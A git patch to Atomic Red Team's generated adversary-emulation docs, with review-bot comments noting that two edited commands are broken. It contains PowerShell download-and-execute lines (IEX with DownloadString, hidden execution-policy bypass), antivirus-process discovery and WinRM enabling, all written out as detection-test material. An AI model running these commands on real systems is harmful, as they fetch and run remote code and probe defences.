From c03d202bd5ad2f897aee0e2fa4e7fb4e3f58fe96 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 5 Sep 2018 15:35:37 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=PowerShell-Executor.Command-Properties
---
 atomics/T1028/T1028.md | 2 +-
 atomics/T1033/T1033.md | 2 +-
 atomics/T1063/T1063.md | 8 ++++----
 atomics/T1074/T1074.md | 2 +-
 atomics/T1086/T1086.md | 4 ++--
 atomics/T1124/T1124.md | 2 +-
 6 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
index 5c8c853bd2..f5c36f8c1a 100644
--- a/atomics/T1028/T1028.md
+++ b/atomics/T1028/T1028.md
@@ -37,7 +37,7 @@ Powershell Enable WinRM
 #### Run it with `powershell`!
 ```
-powershell Enable-PSRemoting -Force
+Enable-PSRemoting -Force
 ```

diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 3d8493a900..771f6fee3e 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -40,7 +40,7 @@ Identify System owner or users on an endpoint
 #### Inputs
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| computer_name | Name of remote computer | strong | computer1|
+| computer_name | Name of remote computer | string | computer1|
 #### Run it with `command_prompt`!
 ```
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index 3b10707388..06b131f550 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -57,10 +57,10 @@ Methods to identify Security Software on an endpoint
 #### Run it with `powershell`!
 ```
-powershell.exe get-process | ?{$_.Description -like "*virus*"}
-powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
-powershell.exe get-process | ?{$_.Description -like "*defender*"}
-powershell.exe get-process | ?{$_.Description -like "*cylance*"}
+get-process | ?{$_.Description -like "*virus*"}
+get-process | ?{$_.Description -like "*carbonblack*"}
+get-process | ?{$_.Description -like "*defender*"}
+get-process | ?{$_.Description -like "*cylance*"}
 ```

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index f6f8183511..cd71c93a0a 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file
 #### Run it with `powershell`!
 ```
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
+"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
 ```
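Review bot: The new `powershell` command in T1074.md is a double-quoted string literal, so it is never evaluated: as written it most likely just writes the text of the command to `c:\windows\pi.log`, and the download step this atomic is meant to exercise does not run. A test that silently does nothing gives a misleading "no detection" result when it is used to validate coverage. With the `powershell.exe` prefix gone the surrounding quotes should go too, so that the line starts at `IEX (New-Object Net.WebClient)...`. Since the subject says these docs are generated, the change probably belongs in the atomic's source definition rather than in this file.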
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 649711dbc3..2f16632709 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -167,7 +167,7 @@ Not proxy aware removing cache although does not appear to write to those locati
 #### Run it with `powershell`!
 ```
-powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
+IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
 ```
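Review bot: The new leading `IEX` in the T1086.md command is followed by `-exec bypass -windowstyle hidden -noprofile`, which are powershell.exe host switches rather than parameters of Invoke-Expression, so the line will most likely fail parameter binding before anything runs. It looks as if the `powershell.exe` prefix was substituted rather than removed. Either drop `IEX` and the three switches so that the line starts at `$comMsXml=New-Object ...`, or keep the full powershell.exe invocation and label the executor `command_prompt`, as the next hunk in this file does. A test that errors out immediately produces no telemetry to validate detections against, and the fix likely belongs in the source these docs are generated from.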

@@ -184,7 +184,7 @@ Powershell xml download request
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
-#### Run it with `powershell`!
+#### Run it with `command_prompt`!
 ```
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
 ```
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index c4d7f6f6e9..57afaae400 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -48,6 +48,6 @@ Identify the system time via PowerShell
 #### Run it with `powershell`!
 ```
-powershell.exe Get-Date
+Get-Date
 ```